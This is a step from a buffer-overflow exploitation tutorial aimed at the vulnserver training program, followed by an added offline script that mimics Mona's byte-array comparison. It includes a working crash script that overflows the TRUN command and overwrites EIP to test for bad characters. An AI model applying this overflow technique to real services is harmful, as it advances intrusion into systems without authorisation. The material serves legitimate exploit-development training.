Step 4: Finding Bad Characters
Some programs stop processing input, or alter it, when they encounter certain "bad characters" (badchars), so we need to make sure our shellcode does not contain any of them.
Generate badchar list using Mona:
!mona bytearray -cpb "\x00"
The output will be saved as "bytearray.txt" in your working folder. This command also generates a "bytearray.bin" file which we will be using shortly.
Write a script for testing badchars:
#!/usr/bin/python3
import sys, socket
from time import sleep

#--------Changeme--------#
#                        #
host = "192.168.1.2"     #
port = 9999              #
#                        #
#------------------------#

# Byte array as generated by: !mona bytearray -cpb "\x00"
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
            b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
            b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
            b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
            b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
            b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
            b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
            b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

offset = 2003  # Distance to EIP, found in the previous step

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    payload = b""
    payload += b"TRUN /.:/"
    payload += b"A" * offset  # Padding up to EIP
    payload += b"B" * 4       # EIP
    payload += badchars       # Byte array, lands at ESP
    s.send(payload)
    s.close()
except OSError as e:
    print("Error connecting to server:", e)
    sys.exit()
Run the script and vulnserver crashes. We will use the ESP value shown in the debugger at the crash to find badchars:

Find badchars using Mona:
!mona compare -f c:\mona\bytearray.bin -a <esp_value>
There is no badchar:

If a badchar is found, delete it from the byte array in the script, regenerate the byte array with Mona excluding it as well, and run the script again. Repeat this process until the compare shows no more badchars.
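As an added example (not part of the original tutorial), the following script is an offline stand-in for what "!mona bytearray" and "!mona compare" do: it builds the byte array minus the excluded bytes, compares a dump of the bytes at ESP with what was sent, and runs the remove-and-retry loop described above. The "target" at the bottom is constructed for illustration; in practice the dump comes from the debugger.

```python
#!/usr/bin/env python3
# Added example, not part of the original tutorial: an offline stand-in for
# "!mona bytearray" and "!mona compare". Generate the array, send it (as the
# script above does), copy the bytes at ESP out of the debugger, and compare
# them with what was sent to find the first byte the target mangled.
# The target used at the bottom is constructed; it stands in for that dump.

def build_bytearray(excluded: bytes = b"\x00") -> bytes:
    """All 256 byte values in order minus those already known to be bad,
    i.e. what '!mona bytearray -cpb <excluded>' writes to bytearray.bin."""
    return bytes(b for b in range(256) if b not in excluded)

def compare(sent: bytes, memory: bytes) -> dict:
    """Find the first point where the bytes in memory diverge from the array
    sent. Tells apart a byte that was stripped (the rest shifted left), a byte
    changed in place, and a copy that stopped early (truncated)."""
    for i, b in enumerate(sent):
        if i >= len(memory):
            return {"status": "truncated", "index": i, "byte": b}
        if memory[i] == b:
            continue
        # If the next two sent bytes now sit at position i, byte i was dropped.
        nxt = sent[i + 1:i + 3]
        if nxt and memory[i:i + len(nxt)] == nxt:
            return {"status": "dropped", "index": i, "byte": b}
        return {"status": "changed", "index": i, "byte": b, "found": memory[i]}
    return {"status": "unmodified", "index": None, "byte": None}

def find_badchars(excluded: bytes, send_and_dump, max_rounds: int = 16) -> bytes:
    """The remove-and-retry loop from the text: send the current array, read
    back memory, exclude the first bad byte, repeat until a round is clean.
    send_and_dump(array) must return the bytes found at ESP after the crash."""
    for _ in range(max_rounds):
        array = build_bytearray(excluded)
        result = compare(array, send_and_dump(array))
        if result["status"] == "unmodified":
            break
        excluded += bytes([result["byte"]])
    return excluded

if __name__ == "__main__":
    # Constructed target: strips carriage returns and line feeds from input.
    def fake_target(array: bytes) -> bytes:
        return array.replace(b"\x0d", b"").replace(b"\x0a", b"")
    print(compare(build_bytearray(), fake_target(build_bytearray())))
    print(find_badchars(b"\x00", fake_target).hex())  # 000a0d
```

Whatever the verdict, the byte at the reported index is the one to exclude next; the loop keeps excluding until the array arrives unmodified, which for vulnserver's TRUN command happens with only "\x00" excluded.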